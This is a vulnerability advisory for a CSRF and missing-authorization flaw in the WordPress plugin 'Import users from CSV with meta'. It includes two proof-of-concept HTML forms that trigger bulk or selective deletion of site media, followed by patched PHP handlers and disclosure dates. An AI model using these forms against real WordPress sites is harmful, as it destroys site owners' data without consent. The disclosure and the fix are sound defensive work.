Import users from CSV with meta [CSRF]


The plugin implements the following AJAX actions:

  • acui_bulk_delete_attachment
  • acui_delete_attachment

Both of them delete attachments from the website, and neither implements any CSRF protection (no nonce check). This allows an attacker to leverage the CSRF vulnerability in order to delete all, or selected, media from the affected website.

Since there are also no capability checks, any authenticated user could exploit this vulnerability.


Bulk delete:
<form method="post" action="">
    <input type="hidden" name="action" value="acui_bulk_delete_attachment">
    <button type="submit" value="Submit">Submit</button>
</form>

Selective delete:
<form method="post" action="">
    <input type="hidden" name="action" value="acui_delete_attachment">
    <input type="text" name="attach_id" value="" placeholder="Attachment ID">
    <button type="submit" value="Submit">Submit</button>
</form>


The latest versions are patched with respect to the acui_delete_attachment action. acui_bulk_delete_attachment appears to still be vulnerable, though it would only delete CSV files uploaded as attachments.
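For reference, this is how the two handlers look with the missing controls (nonce check, capability check, and a scoped bulk action) in place. It is an added example written for this advisory, not the plugin's own code; the function names and the nonce action string are hypothetical, while the WordPress API calls are real.

```php
<?php
// Added example, not the plugin's own code: the two AJAX handlers from the
// advisory with the missing controls in place. Function names and the nonce
// action string are hypothetical.

add_action( 'wp_ajax_acui_delete_attachment', 'acui_example_delete_attachment' );
add_action( 'wp_ajax_acui_bulk_delete_attachment', 'acui_example_bulk_delete_attachment' );
// No wp_ajax_nopriv_ hook: unauthenticated requests get no handler at all.

function acui_example_guard() {
    // CSRF control: the request must carry a nonce bound to this action, which a
    // form on another origin cannot know. check_ajax_referer() dies on failure.
    check_ajax_referer( 'acui_delete_attachment_nonce', 'security' );
    // Authorization control: being logged in is not enough.
    if ( ! current_user_can( 'delete_posts' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }
}

function acui_example_delete_attachment() {
    acui_example_guard();
    $id = isset( $_POST['attach_id'] ) ? absint( $_POST['attach_id'] ) : 0;
    if ( ! $id || 'attachment' !== get_post_type( $id ) ) {
        wp_send_json_error( 'Invalid attachment ID', 400 );
    }
    // Per-object check: the user must be allowed to delete this particular attachment.
    if ( ! current_user_can( 'delete_post', $id ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }
    wp_send_json_success( (bool) wp_delete_attachment( $id, true ) );
}

function acui_example_bulk_delete_attachment() {
    acui_example_guard();
    // Scope the bulk action to CSV uploads only, never to the whole media library.
    $csv_ids = get_posts( array(
        'post_type'      => 'attachment',
        'post_mime_type' => 'text/csv',
        'posts_per_page' => -1,
        'fields'         => 'ids',
    ) );
    $deleted = 0;
    foreach ( $csv_ids as $id ) {
        if ( current_user_can( 'delete_post', $id ) && wp_delete_attachment( $id, true ) ) {
            $deleted++;
        }
    }
    wp_send_json_success( array( 'deleted' => $deleted ) );
}
```

The legitimate admin form must embed the matching token with wp_nonce_field( 'acui_delete_attachment_nonce', 'security' ), so only forms rendered by the site itself can pass the check; the cross-site forms shown above would be rejected with HTTP 403 before any deletion runs.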

WordPress Plugins CSRF
  • 2017-10-03:
  • 2019-03-17:
    No longer valid (fixed in the meantime)